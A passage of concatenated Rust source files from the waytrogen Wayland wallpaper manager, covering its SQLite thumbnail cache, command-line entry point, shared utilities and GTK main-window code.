https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/database.rs
src/database.rs
use crate::common::{CacheImageFile, CACHE_FILE_NAME, CONFIG_APP_NAME}; use anyhow::anyhow; use gettextrs::gettext; use log::{debug, trace, warn}; use rusqlite::{Connection, Result}; use std::path::Path; pub struct DatabaseConnection { connetion: Connection, } impl DatabaseConnection { fn new() -> anyhow::Result<DatabaseConnection> { let xdg_dirs = xdg::BaseDirectories::with_prefix(CONFIG_APP_NAME)?; let cache_path = xdg_dirs.place_cache_file(CACHE_FILE_NAME)?; let conn = Connection::open(cache_path.to_str().unwrap())?; let query = " CREATE TABLE IF NOT EXISTS gtkimagefile ( image TEXT NOT NULL, name TEXT NOT NULL, date INTEGER NOT NULL, path TEXT NOT NULL ); "; conn.execute(query, ())?; Ok(DatabaseConnection { connetion: conn }) } pub fn select_image_file(&self, path: &Path) -> anyhow::Result<CacheImageFile> { let query = "SELECT image, name, date, path FROM GtkImageFile where path = ?1;"; let mut statement = self.connetion.prepare(query)?; let pix_buf_bytes = statement .query_map([path.to_str().unwrap_or_default()], |row| { Ok(CacheImageFile { image: row.get(0)?, name: row.get(1)?, date: row.get(2)?, path: row.get(3)?, }) })? 
.filter_map(|c| c.ok()) .collect::<Vec<_>>(); if pix_buf_bytes.is_empty() { return Err(anyhow!("No result could be found")); } Ok(pix_buf_bytes[0].clone()) } pub fn insert_image_file(&self, image_file: &CacheImageFile) -> anyhow::Result<()> { let query = "INSERT INTO GtkImageFile(image, name, date, path) VALUES (:image, :name, :date, :path);"; self.connetion.execute( query, ( &image_file.image, &image_file.name, &image_file.date, &image_file.path, ), )?; Ok(()) } pub fn check_cache(path: &Path) -> Result<CacheImageFile, anyhow::Error> { let conn = DatabaseConnection::new()?; match conn.select_image_file(path) { Ok(f) => { trace!("{}: {}", gettext("Cache Hit"), f.path); Ok(f) } Err(e) => { trace!( "{}: {} {}", gettext("Cache Miss"), path.to_str().unwrap(), e ); match CacheImageFile::from_file(path) { Ok(g) => { trace!( "{} {}", gettext("GTK Picture created successfully."), g.path ); conn.insert_image_file(&g)?; debug!("{} {}", "Picture inserted into database.", &g.path); Ok(g) } Err(e) => { warn!( "{}: {} {}", gettext("File could not be converted to a GTK Picture"), path.to_str().unwrap(), e ); Err(e) } } } } } }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/main.rs
src/main.rs
use clap::Parser; use gtk::glib; use log::error; use std::{thread::sleep, time::Duration}; use waytrogen::{ cli::{ cycle_next_wallpaper, delete_image_cache, launch_application, print_app_version, print_wallpaper_state, restore_wallpapers, set_random_wallpapers, Cli, }, dotfile::{self, get_config_file}, }; fn main() -> glib::ExitCode { let mut args = Cli::parse(); stderrlog::new() .module(module_path!()) .verbosity(args.log_level as usize) .init() .unwrap(); let config_file = match get_config_file() { Ok(c) => c, Err(e) => { error!("Failed to get config file: {e}"); return glib::ExitCode::FAILURE; } }; match config_file.write_to_gsettings() { Ok(_) => {}, Err(e) => { error!("Failed to write gsettings from configuration file: {e}"); return glib::ExitCode::FAILURE; } } if args.external_script.is_none() && !config_file.executable_script.is_empty() { args.external_script = Some(config_file.executable_script); } if args.restore { sleep(Duration::from_millis(args.startup_delay)); restore_wallpapers() } else if args.list_current_wallpapers { print_wallpaper_state() } else if args.random { sleep(Duration::from_millis(args.startup_delay)); set_random_wallpapers() } else if args.version { print_app_version() } else if args.next.is_some() { sleep(Duration::from_millis(args.startup_delay)); cycle_next_wallpaper(&args) } else if args.delete_cache { delete_image_cache() } else { let _ = launch_application(args); let config_file = match dotfile::ConfigFile::from_gsettings() { Ok(c) => c, Err(e) => { error!("Failed to get config file: {e}"); return glib::ExitCode::FAILURE; } }; match config_file.write_to_config_file() { Ok(_) => glib::ExitCode::SUCCESS, Err(_) => glib::ExitCode::FAILURE, } } }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/common.rs
src/common.rs
use gtk::{glib::SignalHandlerId, Picture}; use image::ImageReader; use lazy_static::lazy_static; use log::trace; use regex::Regex; use serde::{Deserialize, Serialize}; use std::{ cell::RefCell, fmt::Display, io::Cursor, os::unix::fs::PermissionsExt, path::{Path, PathBuf}, process::Command, str::FromStr, time::UNIX_EPOCH, }; use crate::wallpaper_changers::WallpaperChangers; use gettextrs::gettext; pub const THUMBNAIL_HEIGHT: i32 = 200; pub const THUMBNAIL_WIDTH: i32 = THUMBNAIL_HEIGHT; pub const APP_ID: &str = "org.Waytrogen.Waytrogen"; pub const GETTEXT_DOMAIN: &str = "waytrogen"; pub const CONFIG_APP_NAME: &str = "waytrogen"; pub const CACHE_FILE_NAME: &str = "cache.db"; pub const CONFIG_FILE_NAME: &str = "config.json"; pub struct GtkPictureFile { pub picture: Picture, pub cache_image_file: CacheImageFile, pub button_signal_handler: RefCell<Option<SignalHandlerId>>, } #[derive(Clone, Default, PartialEq)] pub struct CacheImageFile { pub image: Vec<u8>, pub name: String, pub date: u64, pub path: String, } impl CacheImageFile { pub fn from_file(path: &Path) -> anyhow::Result<CacheImageFile> { let image = Self::generate_thumbnail(path)?; Self::create_gtk_image(path, image) } fn get_metadata(path: &Path) -> anyhow::Result<(String, String, u64)> { let path = path.to_path_buf(); let name = path.file_name().unwrap().to_str().unwrap().to_owned(); let date = std::fs::File::open(path.clone())?.metadata()?.modified()?; let date = date.duration_since(UNIX_EPOCH)?.as_secs(); Ok((path.to_str().unwrap().to_string(), name, date)) } fn create_gtk_image(path: &Path, image: Vec<u8>) -> anyhow::Result<CacheImageFile> { let fields = Self::get_metadata(path)?; let image_file = CacheImageFile { image, path: fields.0, name: fields.1, date: fields.2, }; Ok(image_file) } fn generate_thumbnail(path: &Path) -> anyhow::Result<Vec<u8>> { if let Ok(i) = Self::try_create_thumbnail_with_image(path) { return Ok(i); } if let Ok(i) = Self::try_create_thumbnail_with_ffmpeg(path) { return Ok(i); } 
Err(anyhow::anyhow!( "{}: {}", gettext("Failed to create thumbnail for"), path.as_os_str().to_str().unwrap_or_default() )) } fn try_create_thumbnail_with_ffmpeg(path: &Path) -> anyhow::Result<Vec<u8>> { let temp_dir = String::from_utf8(Command::new("mktemp").arg("-d").output()?.stdout)?; let output_path = PathBuf::from(temp_dir.trim()).join("temp.png"); trace!("ffmpeg Output Path: {}", output_path.to_str().unwrap()); let code = Command::new("ffmpeg") .arg("-i") .arg(path) .arg("-y") .arg("-ss") .arg("00:00:00") .arg("-frames:v") .arg("1") .arg(output_path.clone()) .spawn()? .wait()? .code() .unwrap_or(255); match code { 0 => Self::try_create_thumbnail_with_image(&output_path), _ => Err(anyhow::anyhow!(gettext( "Thumbnail could not be generated using ffmpg." ))), } } fn try_create_thumbnail_with_image(path: &Path) -> anyhow::Result<Vec<u8>> { let thumbnail = ImageReader::open(path)? .with_guessed_format()? .decode()? .thumbnail(THUMBNAIL_WIDTH as u32, THUMBNAIL_HEIGHT as u32) .to_rgb8(); let mut buff: Vec<u8> = vec![]; thumbnail.write_to(&mut Cursor::new(&mut buff), image::ImageFormat::Png)?; Ok(buff) } } #[derive(Debug, Serialize, Deserialize, Clone, Default, PartialEq)] pub struct RGB { pub red: f32, pub green: f32, pub blue: f32, } impl Display for RGB { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { write!( f, "{:02x}{:02x}{:02x}", (self.red * 255.0) as u8, (self.green * 255.0) as u8, (self.blue * 255.0) as u8 ) } } lazy_static! 
{ static ref rgb_regex: Regex = Regex::new(r"[0-9A-Fa-f]{6}").unwrap(); } impl FromStr for RGB { type Err = String; fn from_str(s: &str) -> Result<Self, Self::Err> { if rgb_regex.is_match(s) { let s = s.to_lowercase().chars().collect::<Vec<_>>(); let red = hex::decode(s[0..=1].iter().collect::<String>()).unwrap(); let red = f32::from(red[0]) / 255.0; let green = hex::decode(s[2..=3].iter().collect::<String>()).unwrap(); let green = f32::from(green[0]) / 255.0; let blue = hex::decode(s[4..=5].iter().collect::<String>()).unwrap(); let blue = f32::from(blue[0]) / 255.0; Ok(Self { red, green, blue }) } else { Err(gettext("Invalid string")) } } } #[derive(Clone, Serialize, Deserialize, Debug, Default)] pub struct Wallpaper { pub monitor: String, pub path: String, pub changer: WallpaperChangers, } pub const APP_VERSION: &str = env!("CARGO_PKG_VERSION"); pub fn sort_by_sort_dropdown_string(files: &mut [PathBuf], sort_by: &str, invert_sort: bool) { match sort_by { "name" => { files.sort_by(|f1, f2| { if invert_sort { f1.file_name().partial_cmp(&f2.file_name()).unwrap() } else { f2.file_name().partial_cmp(&f1.file_name()).unwrap() } }); } "date" => { files.sort_by(|f1, f2| { if invert_sort { f1.metadata() .unwrap() .created() .unwrap() .partial_cmp(&f2.metadata().unwrap().created().unwrap()) .unwrap() } else { f2.metadata() .unwrap() .created() .unwrap() .partial_cmp(&f1.metadata().unwrap().created().unwrap()) .unwrap() } }); } _ => {} } } pub fn parse_executable_script(s: &str) -> anyhow::Result<String> { if s.is_empty() { return Ok(String::new()); } let path = s.parse::<PathBuf>()?; if !path.metadata()?.is_file() { return Err(anyhow::anyhow!("Input is not a file")); } if path.metadata()?.permissions().mode() & 0o111 == 0 { return Err(anyhow::anyhow!("File is not executable")); } Ok(s.to_owned()) } pub fn get_config_file_path() -> anyhow::Result<PathBuf> { let xdg_dirs = xdg::BaseDirectories::with_prefix(CONFIG_APP_NAME)?; let config_file = 
xdg_dirs.place_config_file(CONFIG_FILE_NAME)?; Ok(config_file) }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/main_window.rs
src/main_window.rs
use crate::{ cli::Cli, common::{ CacheImageFile, GtkPictureFile, Wallpaper, APP_ID, THUMBNAIL_HEIGHT, THUMBNAIL_WIDTH, }, ui_common::{ change_image_button_handlers, compare_image_list_items_by_sort_selection_comparitor, generate_changer_bar, generate_image_files, get_available_monitors, get_selected_changer, gschema_string_to_string, hide_unsupported_files, sort_images, string_to_gschema_string, SORT_DROPDOWN_STRINGS, }, wallpaper_changers::{get_available_wallpaper_changers, WallpaperChanger}, }; use async_channel::{Receiver, Sender}; use gettextrs::{gettext, ngettext}; use gtk::{ self, gdk::Texture, gio::{spawn_blocking, Cancellable, ListStore, Settings}, glib::{self, clone, spawn_future_local, BoxedAnyObject, Bytes}, prelude::*, Align, Application, ApplicationWindow, Box, Button, DropDown, Entry, FileDialog, GridView, Label, ListItem, ListScrollFlags, MenuButton, Orientation, Picture, Popover, ProgressBar, ScrolledWindow, SignalListItemFactory, SingleSelection, StringObject, Switch, Text, TextBuffer, }; use log::debug; use std::{ cell::{Ref, RefCell}, path::PathBuf, process::Command, }; #[derive(Clone)] struct SensitiveWidgetsHelper { receiver_changer_options_bar: Receiver<bool>, image_list_store: ListStore, wallpaper_changers_dropdown: DropDown, settings: Settings, sort_dropdown: DropDown, invert_sort_switch: Switch, images_loading_progress_bar: ProgressBar, image_grid: GridView, changer_specific_options_box: Box, removed_images_list_store: ListStore, monitors_dropdown: DropDown, } pub fn build_ui(app: &Application, args: &Cli) { let window = create_application_window(app); if get_available_wallpaper_changers().is_empty() { create_no_changers_window(&window); return; } let settings = Settings::new(APP_ID); let image_list_store = ListStore::new::<BoxedAnyObject>(); let removed_images_list_store = ListStore::new::<BoxedAnyObject>(); let folder_path_buffer = create_folder_path_buffer(&settings); let path = textbuffer_to_string(&folder_path_buffer); log::trace!("{}: 
{}", gettext("Wallpaper Folder"), path); let (sender_cache_images, receiver_cache_images): ( Sender<CacheImageFile>, Receiver<CacheImageFile>, ) = async_channel::bounded(1); let (sender_enable_changer_options_bar, receiver_changer_options_bar): ( Sender<bool>, Receiver<bool>, ) = async_channel::bounded(1); let (sender_images_loading_progress_bar, receiver_images_loading_progress_bar): ( Sender<f64>, Receiver<f64>, ) = async_channel::bounded(1); let open_folder_button = create_open_folder_button(&folder_path_buffer, &window); let monitors_dropdown = create_monitors_dropdown(&settings); let wallpaper_changers_dropdown = create_wallpaper_changers_dropdown(); let image_signal_list_item_factory = setup_image_signal_list_item_factory( &monitors_dropdown, &wallpaper_changers_dropdown, &settings, args.clone(), ); let image_grid = create_image_grid(&image_signal_list_item_factory, &image_list_store); let scrolled_winow = create_image_grid_scrolled_window(&image_grid); let sort_dropdown = create_sort_dropdown(&settings); let (invert_sort_switch, invert_sort_switch_label) = create_invert_sort_switch(&settings); connect_sorting_signals( &sort_dropdown, &invert_sort_switch, &image_list_store, &image_grid, ); let selected_sort_method = selected_item_as_string(&sort_dropdown); generate_image_files( path.clone(), sender_cache_images.clone(), selected_sort_method.clone(), invert_sort_switch.state(), sender_enable_changer_options_bar.clone(), sender_images_loading_progress_bar.clone(), ); let changer_specific_options_box = create_changer_specific_options_box(); connect_wallpaper_changers_signals( &wallpaper_changers_dropdown, &invert_sort_switch, &monitors_dropdown, &settings, &sort_dropdown, changer_specific_options_box.clone(), (&image_list_store, &removed_images_list_store), ); let image_filter_entry = create_image_filter_entry( &settings, &image_list_store, &monitors_dropdown, &sort_dropdown, &invert_sort_switch, &removed_images_list_store, &wallpaper_changers_dropdown, ); let 
options_menu_button = create_options_menu_button(&invert_sort_switch, &invert_sort_switch_label); let hide_changer_options_box = settings.boolean("hide-changer-options-box"); let hide_changer_options_box = if args.hide_bottom_bar.is_some() { args.hide_bottom_bar.unwrap() } else { hide_changer_options_box }; let changer_options_box = create_changer_options_box(hide_changer_options_box); changer_options_box.append(&monitors_dropdown); changer_options_box.append(&open_folder_button); changer_options_box.append(&sort_dropdown); changer_options_box.append(&image_filter_entry); changer_options_box.append(&options_menu_button); changer_options_box.append(&wallpaper_changers_dropdown); changer_options_box.append(&changer_specific_options_box); connect_folder_path_buffer_signals( &folder_path_buffer, &image_list_store, &invert_sort_switch, ( sender_enable_changer_options_bar, sender_images_loading_progress_bar, ), &selected_sort_method, sender_cache_images, ); let application_box = create_application_box(); application_box.append(&scrolled_winow); application_box.append(&changer_options_box); create_cache_image_future(&image_list_store, receiver_cache_images); let images_loading_progress_bar = create_images_loading_progress_bar(); changer_options_box.append(&images_loading_progress_bar); let sensitive_widgets_helper = SensitiveWidgetsHelper { receiver_changer_options_bar, image_list_store, wallpaper_changers_dropdown: wallpaper_changers_dropdown.clone(), settings: settings.clone(), sort_dropdown, invert_sort_switch, images_loading_progress_bar: images_loading_progress_bar.clone(), image_grid, changer_specific_options_box: changer_specific_options_box.clone(), removed_images_list_store, monitors_dropdown, }; create_disable_ui_future(sensitive_widgets_helper); create_progress_image_loading_progress_bar_future( receiver_images_loading_progress_bar, images_loading_progress_bar, ); generate_changer_bar( &changer_specific_options_box, 
&get_selected_changer(&wallpaper_changers_dropdown, &settings), settings, ); window.set_child(Some(&application_box)); } fn setup_image_signal_list_item_factory( monitors_dropdown: &DropDown, wallpaper_changers_dropdown: &DropDown, settings: &Settings, args: Cli, ) -> SignalListItemFactory { let image_signal_list_item_factory = SignalListItemFactory::new(); let previous_wallpapers_text_buffer = TextBuffer::builder().build(); settings .bind("saved-wallpapers", &previous_wallpapers_text_buffer, "text") .build(); image_signal_list_item_factory.connect_setup(clone!(move |_factory, item| { let item = item.downcast_ref::<ListItem>().unwrap(); let button = Button::builder() .vexpand(true) .hexpand(true) .can_shrink(true) .has_tooltip(true) .build(); item.set_child(Some(&button)); })); bind_image_list_item_factory( &image_signal_list_item_factory, monitors_dropdown, wallpaper_changers_dropdown, settings, args, previous_wallpapers_text_buffer, ); image_signal_list_item_factory } fn bind_image_list_item_factory( image_signal_list_item_factory: &SignalListItemFactory, monitors_dropdown: &DropDown, wallpaper_changers_dropdown: &DropDown, settings: &Settings, args: Cli, previous_wallpapers_text_buffer: TextBuffer, ) { image_signal_list_item_factory.connect_bind(clone!( #[weak] monitors_dropdown, #[weak] wallpaper_changers_dropdown, #[weak] settings, move |_factory, item| { let item = item.downcast_ref::<ListItem>().unwrap(); let button = item.child().and_downcast::<Button>().unwrap(); let entry = item.item().and_downcast::<BoxedAnyObject>().unwrap(); let image: Ref<GtkPictureFile> = entry.borrow(); let path = &image.cache_image_file.path; let args = args.clone(); button.set_size_request(THUMBNAIL_WIDTH, THUMBNAIL_HEIGHT); let previous_wallpapers_text_buffer = previous_wallpapers_text_buffer.clone(); let handler = image.button_signal_handler.take(); match handler { Some(h) => image.button_signal_handler.replace(Some(h)), None => image .button_signal_handler 
.replace(Some(button.connect_clicked(clone!( #[strong] path, move |_| { let path = path.clone(); let selected_monitor = monitors_dropdown .selected_item() .unwrap() .downcast::<StringObject>() .unwrap() .string() .to_string(); let selected_changer = get_selected_changer(&wallpaper_changers_dropdown, &settings); let mut previous_wallpapers = serde_json::from_str::<Vec<Wallpaper>>(&gschema_string_to_string( settings.string("saved-wallpapers").as_ref(), )) .unwrap(); let mut new_monitor_wallpapers: Vec<Wallpaper> = vec![]; if !previous_wallpapers .iter() .any(|w| w.monitor == selected_monitor.clone()) { new_monitor_wallpapers.push(Wallpaper { monitor: selected_monitor.clone(), path: path.clone(), changer: selected_changer.clone(), }); } for wallpaper in &mut previous_wallpapers { if wallpaper.monitor == selected_monitor { wallpaper.path.clone_from(&path); wallpaper.changer = selected_changer.clone(); } } previous_wallpapers.append(&mut new_monitor_wallpapers); let previous_wallpapers = previous_wallpapers .clone() .into_iter() .map(|w| Wallpaper { monitor: w.monitor, path: w.path, changer: selected_changer.clone(), }) .collect::<Vec<_>>(); debug!( "{}: {:#?}", gettext("Saved wallpapers"), previous_wallpapers ); let saved_wallpapers = string_to_gschema_string( &serde_json::to_string::<Vec<Wallpaper>>(&previous_wallpapers) .unwrap(), ); previous_wallpapers_text_buffer.set_text(&saved_wallpapers); debug!("{}: {}", gettext("Stored Text"), saved_wallpapers); selected_changer .clone() .change(PathBuf::from(&path.clone()), selected_monitor.clone()); execute_external_script(&args, &path, &selected_monitor, &settings); } )))), }; button.set_tooltip_text(Some(&image.cache_image_file.name)); button.set_child(Some(&image.picture)); } )); } fn execute_external_script(args: &Cli, path: &str, selected_monitor: &str, settings: &Settings) { if args.external_script.is_some() { match Command::new(args.external_script.as_ref().unwrap()) .arg(selected_monitor) .arg(path) 
.arg(gschema_string_to_string(&gschema_string_to_string( settings.string("saved-wallpapers").as_ref(), ))) .spawn() { Ok(_) => { log::debug!("External Script Executed Successfully"); } Err(e) => { log::warn!("External Script Failed to Execute: {e}"); } } } } #[must_use] pub fn create_open_folder_button( folder_path_buffer: &TextBuffer, window: &ApplicationWindow, ) -> Button { let open_folder_button = Button::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::End) .valign(Align::Center) .label(ngettext("Image Folder", "Images Folder", 2)) .build(); let folder_path_buffer_copy = folder_path_buffer.clone(); open_folder_button.connect_clicked(clone!( #[weak] window, move |_| { let dialog = FileDialog::builder() .accept_label("Select Folder") .title("Wallpapers Folder") .build(); let copy = folder_path_buffer_copy.clone(); dialog.select_folder(Some(&window), Cancellable::NONE, move |d| { if let Ok(f) = d { copy.set_text(f.path().unwrap().canonicalize().unwrap().to_str().unwrap()); } }); } )); open_folder_button } fn create_monitors_dropdown(settings: &Settings) -> DropDown { let mut monitors = get_available_monitors(); monitors.insert(0, gettext("All")); let selected_monitor_text_buffer = TextBuffer::builder().build(); debug!("{:?}", monitors); settings .bind( "selected-monitor-item", &selected_monitor_text_buffer, "text", ) .build(); selected_monitor_text_buffer.set_text(settings.string("selected-monitor-item").as_ref()); let monitors_dropdown = DropDown::from_strings( &monitors .iter() .map(std::string::String::as_str) .collect::<Vec<_>>(), ); monitors_dropdown.set_halign(Align::End); monitors_dropdown.set_valign(Align::Center); monitors_dropdown.set_margin_top(12); monitors_dropdown.set_margin_start(12); monitors_dropdown.set_margin_bottom(12); monitors_dropdown.set_margin_end(12); settings .bind("monitor", &monitors_dropdown, "selected") .build(); monitors_dropdown.connect_selected_notify(clone!( #[weak] settings, move |i| 
{ let selected_monitor = i .selected_item() .and_downcast::<StringObject>() .unwrap() .string() .to_string(); selected_monitor_text_buffer.set_text(&selected_monitor); settings .bind( "selected-monitor-item", &selected_monitor_text_buffer, "text", ) .build(); } )); monitors_dropdown } fn create_wallpaper_changers_dropdown() -> DropDown { let wallpaper_changers_dropdown = get_available_wallpaper_changers() .into_iter() .map(|c| c.to_string()) .collect::<Vec<_>>(); let wallpaper_changers_dropdown = DropDown::from_strings( wallpaper_changers_dropdown .iter() .map(std::string::String::as_str) .collect::<Vec<_>>() .as_slice(), ); wallpaper_changers_dropdown.set_halign(Align::End); wallpaper_changers_dropdown.set_halign(Align::Center); wallpaper_changers_dropdown.set_margin_top(12); wallpaper_changers_dropdown.set_margin_start(12); wallpaper_changers_dropdown.set_margin_bottom(12); wallpaper_changers_dropdown.set_margin_end(12); wallpaper_changers_dropdown } fn create_image_grid( image_signal_list_item_factory: &SignalListItemFactory, image_list_store: &ListStore, ) -> GridView { let selection = SingleSelection::builder() .model(&image_list_store.clone()) .autoselect(false) .build(); GridView::builder() .model(&selection) .factory(image_signal_list_item_factory) .max_columns(30) .min_columns(3) .focusable(true) .single_click_activate(true) .focus_on_click(true) .build() } fn create_folder_path_buffer(settings: &Settings) -> TextBuffer { let folder_path_buffer = TextBuffer::builder().build(); settings .bind("wallpaper-folder", &folder_path_buffer, "text") .build(); folder_path_buffer } fn create_image_grid_scrolled_window(image_grid: &GridView) -> ScrolledWindow { ScrolledWindow::builder() .child(image_grid) .valign(Align::Fill) .halign(Align::Fill) .propagate_natural_height(true) .propagate_natural_width(true) .hexpand(true) .vexpand(true) .build() } fn create_sort_dropdown(settings: &Settings) -> DropDown { let strings = SORT_DROPDOWN_STRINGS .into_iter() .map(gettext) 
.collect::<Vec<_>>(); let strings = strings.iter().map(String::as_str).collect::<Vec<_>>(); let sort_dropdown = DropDown::from_strings(&strings); sort_dropdown.set_halign(Align::End); sort_dropdown.set_valign(Align::Center); sort_dropdown.set_margin_top(12); sort_dropdown.set_margin_start(12); sort_dropdown.set_margin_bottom(12); sort_dropdown.set_margin_end(12); settings.bind("sort-by", &sort_dropdown, "selected").build(); sort_dropdown } fn create_invert_sort_switch(settings: &Settings) -> (Switch, Text) { let switch = Switch::builder() .margin_top(12) .margin_bottom(12) .margin_start(12) .margin_end(12) .halign(Align::End) .valign(Align::Center) .build(); let text = Text::builder() .text(gettext("Invert Sort")) .margin_start(3) .margin_top(12) .margin_bottom(12) .margin_end(12) .halign(Align::End) .valign(Align::Center) .build(); settings.bind("invert-sort", &switch, "active").build(); (switch, text) } fn connect_sorting_signals( sort_dropdown: &DropDown, invert_sort_switch: &Switch, image_list_store: &ListStore, image_grid: &GridView, ) { sort_dropdown.connect_selected_notify(clone!( #[strong] invert_sort_switch, #[weak] image_list_store, #[weak] image_grid, move |d| { sort_images(d, &invert_sort_switch, &image_list_store, &image_grid); } )); invert_sort_switch.connect_state_notify(clone!( #[weak] sort_dropdown, #[weak] image_list_store, #[weak] image_grid, move |s| { sort_images(&sort_dropdown, s, &image_list_store, &image_grid); } )); } fn connect_wallpaper_changers_signals( wallpaper_changers_dropdown: &DropDown, invert_sort_switch: &Switch, monitors_dropdown: &DropDown, settings: &Settings, sort_dropdown: &DropDown, changer_specific_options_box: Box, (image_list_store, removed_images_list_store): (&ListStore, &ListStore), ) { wallpaper_changers_dropdown.connect_selected_item_notify(clone!( #[weak] image_list_store, #[weak] monitors_dropdown, #[weak] settings, #[weak] sort_dropdown, #[strong] invert_sort_switch, #[strong] removed_images_list_store, move |w| 
{ change_image_button_handlers(&image_list_store, w, &monitors_dropdown, &settings); hide_unsupported_files( &image_list_store, &get_selected_changer(w, &settings), &removed_images_list_store, &sort_dropdown, &invert_sort_switch, settings.string("image-filter").as_ref(), ); generate_changer_bar( &changer_specific_options_box, &get_selected_changer(w, &settings), settings, ); } )); settings .bind("changer", wallpaper_changers_dropdown, "selected") .build(); } fn create_options_menu_button( invert_sort_switch: &Switch, invert_sort_switch_label: &Text, ) -> MenuButton { let options_box = Box::builder().orientation(Orientation::Vertical).build(); let sort_invert_box = Box::builder().orientation(Orientation::Horizontal).build(); sort_invert_box.append(invert_sort_switch_label); sort_invert_box.append(invert_sort_switch); options_box.append(&sort_invert_box); let options_popover_menu = Popover::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .child(&options_box) .build(); MenuButton::builder() .popover(&options_popover_menu) .halign(Align::Start) .valign(Align::Center) .margin_start(12) .margin_top(12) .margin_bottom(12) .margin_end(12) .label(gettext("Options")) .build() } fn create_changer_options_box(hidden: bool) -> Box { let changer_options_box = Box::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .hexpand(true) .valign(Align::Center) .halign(Align::Center) .hexpand(true) .orientation(Orientation::Horizontal); let changer_options_box = changer_options_box.visible(!hidden); changer_options_box.build() } fn connect_folder_path_buffer_signals( folder_path_buffer: &TextBuffer, image_list_store: &ListStore, invert_sort_switch: &Switch, (sender_enable_changer_options_bar, sender_images_loading_progress_bar): ( Sender<bool>, Sender<f64>, ), selected_sort_method: &str, sender_cache_images: Sender<CacheImageFile>, ) { let selected_sort_method = selected_sort_method.to_string(); 
folder_path_buffer.connect_changed(clone!( #[weak] image_list_store, #[strong] invert_sort_switch, #[strong] sender_enable_changer_options_bar, #[strong] sender_images_loading_progress_bar, #[strong] selected_sort_method, move |f| { let path = f.text(&f.start_iter(), &f.end_iter(), false).to_string(); image_list_store.remove_all(); let state = invert_sort_switch.state(); let selected_sort_method = selected_sort_method.to_string(); spawn_blocking(clone!( #[strong] sender_enable_changer_options_bar, #[strong] sender_images_loading_progress_bar, #[strong] selected_sort_method, #[strong] sender_cache_images, move || { generate_image_files( path.clone(), sender_cache_images, selected_sort_method, state, sender_enable_changer_options_bar, sender_images_loading_progress_bar, ); } )); } )); } fn create_application_box() -> Box { Box::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .hexpand(true) .vexpand(true) .orientation(Orientation::Vertical) .build() } fn selected_item_as_string(dropdown: &DropDown) -> String { dropdown .selected_item() .unwrap() .downcast::<StringObject>() .unwrap() .string() .to_string() } fn create_changer_specific_options_box() -> Box { Box::builder() .halign(Align::Start) .valign(Align::Center) .hexpand(true) .orientation(Orientation::Horizontal) .build() } fn create_cache_image_future( image_list_store: &ListStore, receiver_cache_images: Receiver<CacheImageFile>, ) { spawn_future_local(clone!( #[weak] image_list_store, async move { while let Ok(image) = receiver_cache_images.recv().await { image_list_store.append(&BoxedAnyObject::new(GtkPictureFile { picture: Picture::for_paintable( &Texture::from_bytes(&Bytes::from(&image.image)).unwrap(), ), cache_image_file: image, button_signal_handler: RefCell::new(None), })); } } )); } fn create_images_loading_progress_bar() -> ProgressBar { ProgressBar::builder() .opacity(1.0) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::Center) 
.valign(Align::Center) .text(gettext("Images are loading, please wait")) .show_text(true) .visible(true) .sensitive(true) .build() } fn create_disable_ui_future(sensitive_widgets_helper: SensitiveWidgetsHelper) { spawn_future_local(clone!(async move { while let Ok(b) = sensitive_widgets_helper .receiver_changer_options_bar .recv() .await { debug!("{}", gettext("Finished loading images")); sensitive_widgets_helper .images_loading_progress_bar .set_visible(!b); sensitive_widgets_helper.monitors_dropdown.set_sensitive(b); sensitive_widgets_helper .clone() .sort_dropdown .set_sensitive(b); sensitive_widgets_helper .clone() .invert_sort_switch .set_sensitive(b); sensitive_widgets_helper .wallpaper_changers_dropdown .set_sensitive(b); sensitive_widgets_helper .changer_specific_options_box .set_sensitive(b); sensitive_widgets_helper.image_grid.set_sensitive(b); if b { debug!("{}", gettext("Hiding unsupported images")); hide_unsupported_files( &sensitive_widgets_helper.clone().image_list_store, &get_selected_changer( &sensitive_widgets_helper.wallpaper_changers_dropdown, &sensitive_widgets_helper.clone().settings, ), &sensitive_widgets_helper.clone().removed_images_list_store, &sensitive_widgets_helper.clone().sort_dropdown, &sensitive_widgets_helper.clone().invert_sort_switch, sensitive_widgets_helper .settings .string("image-filter") .as_ref(), ); sensitive_widgets_helper.image_list_store.sort( compare_image_list_items_by_sort_selection_comparitor( sensitive_widgets_helper.sort_dropdown.clone(), sensitive_widgets_helper.invert_sort_switch.clone(), ), ); sensitive_widgets_helper .image_grid .scroll_to(0, ListScrollFlags::NONE, None); } } })); } fn create_progress_image_loading_progress_bar_future( receiver_images_loading_progress_bar: Receiver<f64>, images_loading_progress_bar: ProgressBar, ) { spawn_future_local(clone!(async move { while let Ok(f) = receiver_images_loading_progress_bar.recv().await { images_loading_progress_bar.set_fraction(f); } })); } fn 
